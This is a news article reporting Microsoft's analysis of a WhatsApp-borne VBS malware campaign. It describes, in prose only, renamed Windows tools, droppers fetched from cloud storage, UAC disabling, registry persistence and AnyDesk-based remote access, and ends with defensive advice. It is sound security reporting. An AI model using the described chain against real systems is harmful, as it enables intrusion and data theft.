WhatsApp malware campaign installs backdoors

Microsoft has observed a malware campaign in which attackers send VBS files (Visual Basic Script) in WhatsApp messages. If victims execute them, it triggers a multi-stage infection chain, at the end of which the attackers gain remote access and establish a foothold in the system. Users of the WhatsApp desktop version on Windows are particularly at risk, as the malicious scripts can be executed there without detours.

In a blog post, the Microsoft Defender Security team warns of this campaign, which began at the end of February. The attackers rely on social engineering and so-called “living-off-the-land” techniques (also known by the abbreviation “LOLbins”), thus using executable files supplied by the operating system for the attack. The ultimately installed malware in MSI format (Microsoft Installer) finally comes from the cloud.

WhatsApp as the entry point of the attack chain

The IT forensic experts do not provide examples of observed messages but explain that the malicious VBS files arrive as WhatsApp messages to the victims, thus abusing the trust in the familiar communication platform. Upon execution, the script creates hidden folders under “C:\ProgramData” and stores renamed versions of legitimate Windows tools there, such as “curl.exe” – renamed to “netapi.dll” – or “bitsadmin.exe” as “sc.exe”.

In the next step, the malware, using the renamed binary files, downloads further droppers such as “auxs.vbs” and “WinUpdate_KB5034231.vbs” from cloud storage services often considered trustworthy, such as AWS S3, Tencent Cloud, or Backblaze B2. This disguises the malicious activities as legitimate network traffic, explain the Microsoft employees.

After downloading, the malware modifies User Account Control settings to weaken the Windows system's defense mechanisms by disabling UAC prompts. It repeatedly starts the command prompt “cmd.exe” with elevated privileges until the privilege escalation is successful or the process is forcibly terminated. By modifying registry entries under “HKLM\Software\Microsoft\Win,” the malicious code anchors itself and achieves persistence across reboots.

The subsequent final stage downloads unsigned MSI installers with names such as Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi. These contain remote control software like AnyDesk and enable attackers to gain persistent remote access for data exfiltration, installing further malware, or abusing compromised machines as part of a larger network of infected devices, the analysts explain. Especially in corporate environments, such MSI installers are typical for software management and are thus intended to remain under the radar.

Those interested can find tips and advice in the analysis on how IT managers can protect their networks from such attacks. This includes blocking scripting hosts on endpoints or monitoring cloud traffic, but also employee awareness training.

Users of popular messengers, especially prominent figures or high-ranking officials and politicians, have recently often been targeted by attackers. Around the end of last year, cybercriminals with sophisticated social engineering tactics attempted to gain access to the Messenger apps of potential victims and thus spy on them. Therefore, particular caution is advised, especially with messages from unknown senders.

(dmk)